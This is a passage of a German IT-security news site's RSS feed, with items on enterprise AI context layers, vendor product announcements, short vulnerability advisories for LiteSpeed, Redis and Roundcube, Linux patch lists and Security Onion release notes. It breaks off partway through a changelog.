system uses a technique called "<a href="https://zip.com/engineering-blog/translating-user-generated-content">lazy persistence</a>," where translations are initially stored with a one-week TTL and only promoted to permanent storage when a user actually reads them. This kind of deeply procurement-specific infrastructure — designed to support AI agents that operate across languages, jurisdictions, and regulatory regimes — takes years to build, not quarters, and no general-purpose AI tool can replicate it with a better model alone.</p><h2><b>The real product Zip is selling is the audit trail</b></h2><p>The central question for Zip — and for every enterprise software company racing to embed agentic AI into regulated workflows — is whether governance-first AI agents will actually earn the trust of procurement teams that have spent decades building manual controls for very good reasons. The regulatory stakes are real: SOX fines, criminal liability for executives, stock exchange delisting for companies that fail compliance audits. When an auditor shows up and asks how a purchasing decision was made, someone has to produce a paper trail.</p><p>That is ultimately the bet Zip is making with Superagents and MCP. Not that AI can do procurement work — at this point, that's table stakes — but that AI can do procurement work and leave a record that will satisfy an auditor two years from now. In a market flooded with companies promising autonomous agents, Zip is wagering that the most valuable thing an AI can produce isn't a decision. It's proof that the decision was made correctly.</p><p><a href="https://zip.com/">Zip MCP</a> and <a href="https://zip.com/ai">Zip Superagents</a> are available in beta today, included with all core Zip products, with general availability expected this summer. <a href="https://zip.com/platform-overview">Zip AI Spend Automation</a> is available now for enterprise customers.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents keep giving confident wrong answers. The context layer is enterprise AI's next production problem.]]></title>
<description><![CDATA[Enterprise AI agents have a new production failure mode, and it is not the model. As enterprises move from single-layer RAG to hybrid retrieval architectures, the same underlying data produces different answers depending on which agent, tool or system asks the question. Revenue means one thing in...]]></description>
<link>https://tsecurity.de/de/3566311/it-nachrichten/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566311/it-nachrichten/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem/</guid>
<pubDate>Tue, 02 Jun 2026 15:47:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise AI agents have a new production failure mode, and it is not the model. As enterprises move from single-layer RAG to hybrid retrieval architectures, the same underlying data produces different answers depending on which agent, tool or system asks the question. Revenue means one thing in a business intelligence (BI) dashboard, something slightly different in a SQL table and something else again in an agent instruction. The retrieval infrastructure build-out of the past two years produced faster and cheaper vector search. It did not produce a shared definition of what the data means.</p><p>At Snowflake Summit 26 in San Francisco, the data cloud vendor is taking a broad swing at that problem, with announcements spanning a Kafka-compatible managed streaming service called Data Stream, adaptive compute improvements, expanded Apache Iceberg interoperability and updates to its Cowork and CoCo agent and coding products. Running underneath all of it is a context layer: Horizon Context and Cortex Sense, a two-layer system designed to give agents a governed, shared definition of business logic across retrieval stacks. The context problem is why it matters: VentureBeat's<a href="https://venturebeat.com/data/the-retrieval-rebuild-why-hybrid-retrieval-intent-tripled-as-enterprise-rag-programs-hit-the-scale-wall"> VB Pulse Q1 2026 data,</a> drawn from a survey of organizations with 100 or more employees, shows hybrid retrieval intent tripling from 10.3% in January to 33.3% in March, the fastest-growing strategic position in the dataset.</p><p>"There are a lot of tools out there that you can ask questions, you get a very confident answer, but whether it's correct or not is different," said Christian Kleinerman, EVP of Product at Snowflake.</p><h2>From fragmented business logic to a governed context layer</h2><p>The problem Horizon Context targets is specific. Business logic today is distributed across SQL, BI dashboards and agent instructions, and no single system owns the definition. When multiple agents or tools query the same underlying data, they reason over different schemas and return different answers. Horizon Context is Snowflake's attempt to fix that at the catalog layer rather than at the agent layer.</p><p><b>Horizon Context.</b> The customer-managed layer, built on Snowflake's acquisition of Select Star. It pulls metadata from Postgres, SQL Server, Tableau and Power BI into the Horizon Catalog, so every agent, BI tool and external system draws from the same governed definition rather than reasoning independently over a raw physical schema. Semantic View Autopilot automatically creates and refines semantic views over time, extending curated business logic without requiring ongoing manual effort.</p><p><b>Cortex Sense.</b> The platform-derived layer. It automatically builds and enriches context from customer data and usage patterns on an ongoing basis, without requiring manual semantic view authoring. Kleinerman described it as improving the default experience before any explicit curation has happened.</p><p>The distinction between the two layers is architectural and Kleinerman was precise about it. "Think of Horizon Context as everything that is explicit and declared by customers, and Cortex Sense is anything that is implicit and derived by us," Kleinerman said. </p><p>The two layers connect to Snowflake's existing retrieval infrastructure. Cortex Search, the company's RAG implementation, plugs into both CoCo and Cowork as a tool, so context enriched by either layer flows into retrieval workflows.</p><p>While Horizon Context is a Snowflake technology, the goal is for it to be interoperable and open.  Snowflake is tying the technology  to the Open Semantic Interchange, making customer-declared definitions portable across third-party catalogs and tools. </p><p>"Horizon Context, 100% we're committed to and leading the effort to make sure that that's not locked in," Kleinerman said.</p><h2>Context layers are everywhere. The question is which ones actually work.</h2><p>Snowflake is joining an increasingly crowded field of vendors targeting the same problem. Microsoft has opened its <a href="https://venturebeat.com/data/enterprise-ai-agents-keep-operating-from-different-versions-of-reality">Fabric IQ business ontology via MCP</a> so any vendor's agent can draw from a shared semantic layer. <a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits">Redis launched Iris</a>, a context and memory platform that sits between agents and their data, built on a storage engine redesigned for agent-scale retrieval volumes. <a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next">Pinecone is repositioning from vector database to knowledge engine</a> with Nexus, which compiles enterprise data into task-specific artifacts before agents ever query them.</p><p>Devin Pratt, research director at IDC, told VentureBeat that in his view Snowflake is headed in the right direction and is going where the whole market is heading. </p><p>"Agents are only as good as the data and semantics behind them, so the context layer, not the model, is the thing to watch right now," Pratt said. </p><p>In Pratt's view, what works about Snowflake's version is the split. Horizon Context covers what teams declare and curate themselves, and Cortex Sense covers what the platform picks up automatically. Just as important, they've anchored Horizon Context inside the catalog and governance layer rather than bolting it on after the fact.</p><p>"The context layer is the real battleground for agentic AI. An agent is only as trustworthy as the data and semantics behind it" Pratt said.</p><p>Mike Leone, VP and principal analyst at Moor Insights and Strategy, agreed that treating the two layers differently is the right architectural call.</p><p>"I like where Snowflake's heading. They're splitting context into two buckets, with Horizon Context covering what customers explicitly define and Cortex Sense covering what the platform figures out on its own," Leone told VentureBeat. "You can't trust those two things the same way, so treating them differently is the right call. If Snowflake can show those two layers reconcile cleanly and you can see where every answer came from, they've got something real."</p><h2>What this means for enterprises</h2><p>For enterprises evaluating context layers, the architectural direction is clear. The execution gap is not.</p><p><b>Agents raise the bar on an old problem.</b> The semantic layer idea has existed for years, but agents change what failure costs — when an agent gives a wrong answer at scale, the damage is immediate. Leone is direct about what that means for most vendors currently in the market.

"Most vendors selling a drop-in fix are overpromising," Leone said. "Drop one into a real enterprise and it mostly exposes how messy your data and definitions already are, and a lot of companies are about to find that out the hard way."</p><p><b>The evaluation bar is specific.</b> Pratt identified what separates context layers that work from those that stall: governance and lineage built in so teams can audit why an agent gave the answer it did, portability so context and policy are not locked to one vendor, and accuracy that can be measured and reused across agents and tools.</p><p>"Enterprises don't need another silo of semantics,"  Pratt said. "They need a context layer that's governed, portable, and trustworthy enough to audit."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kritische LiteSpeed-Lücke mit CVSS 10.0 wird aktiv ausgenutzt]]></title>
<description><![CDATA[Die kritische Sicherheitslücke CVE-2026-48172 im LiteSpeed cPanel-Plugin ermöglicht jedem cPanel-Konto über die Redis-API die Ausführung be­lie­bi­ger Skripte mit Root-Rechten. Die Lücke hat den maximalen CVSS-Wert 10.0 und wird von CISA als bekannt ausgenutzte Schwachstelle geführt. Patches sind...]]></description>
<link>https://tsecurity.de/de/3561962/it-security-nachrichten/kritische-litespeed-luecke-mit-cvss-100-wird-aktiv-ausgenutzt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561962/it-security-nachrichten/kritische-litespeed-luecke-mit-cvss-100-wird-aktiv-ausgenutzt/</guid>
<pubDate>Mon, 01 Jun 2026 07:20:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die kritische Sicherheitslücke CVE-2026-48172 im LiteSpeed cPanel-Plugin ermöglicht jedem cPanel-Konto über die Redis-API die Ausführung be­lie­bi­ger Skripte mit Root-Rechten. Die Lücke hat den maximalen CVSS-Wert 10.0 und wird von CISA als bekannt ausgenutzte Schwachstelle geführt. Patches sind verfügbar, Betreiber betroffener Hosting-Server sollten umgehend aktualisieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Flaw And Order: Finding The Needle In The Haystack Of CodeQL Using LLMs]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 0x - Views:91 Running CodeQL's built-in queries on Redis gave me over 6,800 potential issues. Doable, maybe. But when I tried FFmpeg, I got over 51,000. That's way too much for me. And how many of those are real vulnerabilities? Probably around 0.01%. The sheer numb...]]></description>
<link>https://tsecurity.de/de/3557488/it-security-video/black-hat-europe-2025-flaw-and-order-finding-the-needle-in-the-haystack-of-codeql-using-llms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557488/it-security-video/black-hat-europe-2025-flaw-and-order-finding-the-needle-in-the-haystack-of-codeql-using-llms/</guid>
<pubDate>Sat, 30 May 2026 01:03:25 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 0x - Views:91 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/gcsIUqb6s_8?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Running CodeQL's built-in queries on Redis gave me over 6,800 potential issues. Doable, maybe. But when I tried FFmpeg, I got over 51,000. That's way too much for me. And how many of those are real vulnerabilities? Probably around 0.01%. The sheer number of false positives makes static code analysis impractical - who wants to manually sift through tens of thousands of results just to find a few actual security flaws?<br />
To fix this, we built an open-source tool that fuses CodeQL with an LLM-driven agent. This agent autonomously navigates the code, running targeted queries to extract only the relevant context. On top of that, we introduced Guided Questioning, an advanced reasoning technique that keeps the LLM focused, improving accuracy even for complex vulnerabilities.<br />
<br />
<br />
Using this approach, we reduced false positives by up to 97% and uncovered more than a dozen real-world security issues in Linux, Apache, FFmpeg, Bullet3, Libvips, libretro, Linenoise, and other widely used open-source projects.<br />
<br />
By: Simcha Kosman  |  Senior Security Researcher, Cyberark<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#flaw-and-order-finding-the-needle-in-the-haystack-of-codeql-using-llms-49247<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SQL query logs hold the context AI agents need to stop hallucinating joins]]></title>
<description><![CDATA[When Miro’s data team pointed AI agents directly at its Snowflake environment, the agents got the wrong answer more than 65% of the time. The problem wasn’t the model — it was context. With more than 10,000 tables and no semantic layer to guide routing, the agents had no way to know which data as...]]></description>
<link>https://tsecurity.de/de/3554968/it-nachrichten/sql-query-logs-hold-the-context-ai-agents-need-to-stop-hallucinating-joins/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554968/it-nachrichten/sql-query-logs-hold-the-context-ai-agents-need-to-stop-hallucinating-joins/</guid>
<pubDate>Thu, 28 May 2026 18:46:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Miro’s data team pointed AI agents directly at its Snowflake environment, the agents got the wrong answer more than 65% of the time. The problem wasn’t the model — it was context. With more than 10,000 tables and no semantic layer to guide routing, the agents had no way to know which data assets matched which business questions.</p><p>DataHub is releasing a context intelligence layer Thursday that mines existing SQL query history to build a semantic index — and exposes it to agents via MCP, LangChain, Google’s Agent Development Kit and CrewAI. The company calls it Context Intelligence, and it’s built on the same query-log infrastructure DataHub has used for lineage tracking in production deployments worldwide.</p><p>The company was founded by the team that built DataHub as an open source project at LinkedIn, where co-founder and CTO Shirshanka Das led data infrastructure for nearly 11 years. The open source project now has more than 15,000 contributors and 3,000 production deployments worldwide.</p><p>"For the first time, enterprises can turn years of analyst query history into a living, retrievable knowledge base where agents stop hallucinating joins because they have access to the joins that have worked before, validated by the people who ran them," Shirshanka Das, co-founder and CTO of DataHub, told VentureBeat in an exclusive interview.</p><h2>Why query history beats raw schema for agent routing</h2><p>DataHub began as a metadata management project at LinkedIn, built to solve two problems simultaneously: making data easy to find and use across the organization while ensuring it was only used for the right reasons. Das open-sourced the project in early 2020 after nearly six years of internal development.</p><p>The primary use case in the years since has been lineage — understanding how data flows from operational systems through streaming infrastructure into warehouses and out to business tools. Regulatory compliance audits, operational triage and new engineer onboarding all depend on that lineage graph. Postgres is the most-connected source in the DataHub deployment base globally, followed by MySQL, Oracle and the major cloud warehouses including Snowflake and Google BigQuery. The platform supports more than 100 connected metadata sources.</p><p>That deployed base matters for what DataHub is releasing. The query log extraction and SQL parsing capabilities powering Context Intelligence were developed across years of production deployment, not built for this release. The same infrastructure now serves agents querying a semantic index at runtime.</p><p>"The consumption layer has changed from humans to agents," Das said.</p><h2>Context Intelligence mines validated query history, not raw logs</h2><p>Context Intelligence is a new capability layer built on top of DataHub's existing open source metadata foundation. The open source platform has spent years extracting and parsing query logs from connected warehouses for lineage tracking. That same infrastructure is what Context Intelligence draws on to build the semantic index. The capability is new. The underlying plumbing is not.</p><p><b>Filtering for signal.</b> Warehouse query logs contain too much noise to use directly. DataHub's engine filters for what Das describes as the "golden queries," meaning high-quality analyst queries and scheduled pipelines that represent proven business logic.</p><p><b>Inverting SQL into semantic definitions.</b> The engine extracts patterns from those queries and translates them into structured text definitions DataHub calls semantic anchors. Those anchors form the retrieval basis agents draw on before generating SQL.
 "You can almost think of it as inverting text to SQL," Das said.</p><p><b>Human validation on top.</b> Context Hub lets domain experts review AI-proposed context, resolve conflicting definitions and simulate the impact of changes before publishing. DataHub surfaces cases where different teams calculate the same metric differently and raises them for human resolution.</p><h2>How Miro got AI agents working across 10,000 Snowflake tables</h2><p>Miro, the digital collaboration platform, was already using DataHub for lineage tracking and impact analysis when it began testing analytics agents against its Snowflake environment. Ronald Angel, product manager for the data platform at Miro told VentureBeat that the scale of the data estate became the problem immediately. Sending natural language queries directly to the Snowflake MCP produced incorrect answers more than 65% of the time. Exposing more than 10,000 tables directly to agents caused too much confusion for reliable routing.</p><p>Miro addressed the problem by organizing data into well-defined data products that constrain what agents can see rather than exposing raw schema. The production architecture runs from user requests submitted via Claude Chat or Claude Cowork through a context layer where DataHub's MCP maps natural language to the appropriate data assets, then hands off to Snowflake's MCP for SQL generation.</p><p>Angel said the context layer pulls in metadata, entity relationships, query history and business intent for each Snowflake table, specifically what business question each entity is designed to answer. Those semantic signals allow the agent to identify the correct database entities before writing SQL rather than guessing from schema alone.</p><h2>Pinecone, Oracle, Redis, Microsoft: how DataHub fits the context stack</h2><p>Data vendors including<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next"> Pinecone</a>,<a href="https://venturebeat.com/data/oracle-converges-the-ai-data-stack-to-give-enterprise-agents-a-single"> Oracle</a> and<a href="https://venturebeat.com/data/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits"> Redis</a> all have contextual memory capabilities. On the platform side Microsoft has built out its<a href="https://venturebeat.com/data/enterprise-ai-agents-keep-operating-from-different-versions-of-reality"> Fabric IQ</a> as a semantic layer for context.</p><p>DataHub’s argument isn’t feature parity. The company is positioning the context layer as platform-neutral — provisioning context into existing endpoints like Snowflake semantic views and Microsoft Fabric IQ rather than replacing them.</p><p>"A lot of times people want to be platform neutral when it comes to their context layer," Das said. </p><p>Kevin Petrie, an analyst at BARC, told VentureBeat that he sees DataHub's ability to integrate diverse metadata for both structured and unstructured objects, including documents and images, as differentiating them in the market. </p><p>"Many other vendors are more focused on structured tables, which provide trusted facts but often lack the rich context of text objects," he said.</p><p>Michael Ni, VP and principal analyst at Constellation Research, told VentureBeat that for him what stands out about DataHub’s context layer is its support of the shift from passive cataloging to continuously refreshed semantic intelligence.

Ni described the competition for context as the next major platform war, arguing that whoever controls context at runtime controls the decision layer for data, agents, workflows and decisions. </p><p>"Buyers need to be careful, since many vendors only support a portion of the full context capabilities required for AI and agentic solutions," Ni said. "Buyers should be clear on their context management requirements, as vector memory isn't business meaning, business meaning isn't governance, and governance isn't execution."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox, gdk-pixbuf2, glibc, gnutls, kernel, libexif, mysql8.4, postgresql16, postgresql18, python3.14, ruby:3.3, and ruby:4.0), Debian (krb5, roundcube, starlette, unbound, and varnish), Fedora (kernel, nginx, nginx-mod-brotli, nginx-mod-fancyindex...]]></description>
<link>https://tsecurity.de/de/3554256/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554256/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 28 May 2026 15:09:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox, gdk-pixbuf2, glibc, gnutls, kernel, libexif, mysql8.4, postgresql16, postgresql18, python3.14, ruby:3.3, and ruby:4.0), <b>Debian</b> (krb5, roundcube, starlette, unbound, and varnish), <b>Fedora</b> (kernel, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, perl-Imager, poppler, python-uv-build, rrdtool, rust-astral-tokio-tar, rust-astral_async_http_range_reader, rust-astral_async_zip, uv, and xen), <b>Oracle</b> (.NET 10.0, .NET 9.0, glibc, ruby:3.3, and thunderbird), <b>Red Hat</b> (.NET 10.0, .NET 8.0, .NET 9.0, containernetworking-plugins, gvisor-tap-vsock, podman, runc, and skopeo), <b>SUSE</b> (agama, alloy, bubblewrap, cockpit, cups, dnsmasq, emacs, glibc, gnutls, go1.25, go1.25-openssl, go1.26, go1.26-openssl, google-guest-agent, hplip, ibus-rime, librime, kernel, libarchive, libzypp, nginx, openexr, openssh, php7, postgresql14, postgresql15, postgresql16, python311-pytest-html, redis, redis7, rsync, tree-sitter, valkey, xen, and yq), and <b>Ubuntu</b> (cableswig, commons-beanutils, dnsmasq, ffmpeg, foomuuri, gst-plugins-good1.0, libcaca, libgcrypt20, mediawiki, memcached, papers, postorius, tgt, and tika).]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in redis (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3552456/it-security-nachrichten/mehrere-probleme-in-redis-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552456/it-security-nachrichten/mehrere-probleme-in-redis-suse/</guid>
<pubDate>Wed, 27 May 2026 23:23:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in redis (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3552455/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552455/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-suse/</guid>
<pubDate>Wed, 27 May 2026 23:23:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Stateless JWT Auth Microservice Architecture With Spring Boot 3 and Redis Sentinel]]></title>
<description><![CDATA[In this article, I will discuss a highly available solution developed using Spring Boot 3 and Spring Security 6 to address the “centralized authentication method” problem frequently seen in modern microservice ecosystems. We are not simply moving to an “authorization…
Read more →
The post Statele...]]></description>
<link>https://tsecurity.de/de/3552289/it-security-nachrichten/stateless-jwt-auth-microservice-architecture-with-spring-boot-3-and-redis-sentinel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552289/it-security-nachrichten/stateless-jwt-auth-microservice-architecture-with-spring-boot-3-and-redis-sentinel/</guid>
<pubDate>Wed, 27 May 2026 21:37:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this article, I will discuss a highly available solution developed using Spring Boot 3 and Spring Security 6 to address the “centralized authentication method” problem frequently seen in modern microservice ecosystems. We are not simply moving to an “authorization…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/stateless-jwt-auth-microservice-architecture-with-spring-boot-3-and-redis-sentinel/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/stateless-jwt-auth-microservice-architecture-with-spring-boot-3-and-redis-sentinel/">Stateless JWT Auth Microservice Architecture With Spring Boot 3 and Redis Sentinel</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Compliance check cli tool for Linux services and packages configurations]]></title>
<description><![CDATA[Scc is a sparrow plugin that could be run over terminal to check security best practice of your Linux conf files :  sshd sudoers bind redis sysctl  more services are coming , check it out and let me know what you think https://github.com/melezhik/sparrow-plugins/tree/master/scc    submitted by   ...]]></description>
<link>https://tsecurity.de/de/3548515/linux-tipps/compliance-check-cli-tool-for-linux-services-and-packages-configurations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548515/linux-tipps/compliance-check-cli-tool-for-linux-services-and-packages-configurations/</guid>
<pubDate>Tue, 26 May 2026 17:27:34 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Scc is a sparrow plugin that could be run over terminal to check security best practice of your Linux conf files :</p> <ul> <li>sshd</li> <li>sudoers</li> <li>bind</li> <li>redis</li> <li>sysctl</li> </ul> <p>more services are coming , check it out and let me know what you think</p> <p><a href="https://github.com/melezhik/sparrow-plugins/tree/master/scc">https://github.com/melezhik/sparrow-plugins/tree/master/scc</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/melezhik"> /u/melezhik </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tnvwzf/compliance_check_cli_tool_for_linux_services_and/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tnvwzf/compliance_check_cli_tool_for_linux_services_and/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Redis 8.8: Neuer Array-Datentyp und Rate Limiting per Befehl]]></title>
<description><![CDATA[Mit dem neuen Array-Datentyp, dem Rate-Limiting-Befehl INCREX und Erweiterungen für Streams und Vektorsuche richtet sich Redis 8.8 verstärkt an KI-Workloads.]]></description>
<link>https://tsecurity.de/de/3548357/it-nachrichten/redis-88-neuer-array-datentyp-und-rate-limiting-per-befehl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548357/it-nachrichten/redis-88-neuer-array-datentyp-und-rate-limiting-per-befehl/</guid>
<pubDate>Tue, 26 May 2026 16:48:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit dem neuen Array-Datentyp, dem Rate-Limiting-Befehl INCREX und Erweiterungen für Streams und Vektorsuche richtet sich Redis 8.8 verstärkt an KI-Workloads.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-48847 | Roundcube Webmail up to 1.6.15/1.7.0 redis/memcache resource transfer (EUVD-2026-31724)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Roundcube Webmail up to 1.6.15/1.7.0. This vulnerability affects unknown code of the component redis/memcache. The manipulation leads to incorrect resource transfer.

This vulnerability is referenced as CVE-2026-48847. Remote...]]></description>
<link>https://tsecurity.de/de/3546698/sicherheitsluecken/cve-2026-48847-roundcube-webmail-up-to-1615170-redismemcache-resource-transfer-euvd-2026-31724/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546698/sicherheitsluecken/cve-2026-48847-roundcube-webmail-up-to-1615170-redismemcache-resource-transfer-euvd-2026-31724/</guid>
<pubDate>Tue, 26 May 2026 04:19:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/roundcube:webmail">Roundcube Webmail up to 1.6.15/1.7.0</a>. This vulnerability affects unknown code of the component <em>redis/memcache</em>. The manipulation leads to incorrect resource transfer.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-48847">CVE-2026-48847</a>. Remote exploitation of the attack is possible. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[3.1.0-20260521]]></title>
<description><![CDATA[Download the ISO
https://github.com/Security-Onion-Solutions/securityonion/blob/141a61f5b53d44e647350ac2c4b48be1708fd807/DOWNLOAD_AND_VERIFY_ISO.md
What's Changed

Version Bump by @TOoSmOotH in #15699
Update SOUP_BRANCH to use 3/main instead of 2.4/main by @TOoSmOotH in #15701
soup fix by @TOoSmO...]]></description>
<link>https://tsecurity.de/de/3537652/it-security-tools/310-20260521/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3537652/it-security-tools/310-20260521/</guid>
<pubDate>Thu, 21 May 2026 21:48:51 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Download the ISO</h2>
<p><a href="https://github.com/Security-Onion-Solutions/securityonion/blob/141a61f5b53d44e647350ac2c4b48be1708fd807/DOWNLOAD_AND_VERIFY_ISO.md">https://github.com/Security-Onion-Solutions/securityonion/blob/141a61f5b53d44e647350ac2c4b48be1708fd807/DOWNLOAD_AND_VERIFY_ISO.md</a></p>
<h2>What's Changed</h2>
<ul>
<li>Version Bump by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181212251" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15699" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15699/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15699">#15699</a></li>
<li>Update SOUP_BRANCH to use 3/main instead of 2.4/main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181654877" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15701" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15701/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15701">#15701</a></li>
<li>soup fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181673883" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15702" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15702/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15702">#15702</a></li>
<li>pr/workflow changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187529672" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15704" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15704/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15704">#15704</a></li>
<li>Merge pr/workflow changes back to dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187602952" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15705" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15705/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15705">#15705</a></li>
<li>Fix JA4+ license link in soc_zeek.yaml by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212107947" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15724" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15724/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15724">#15724</a></li>
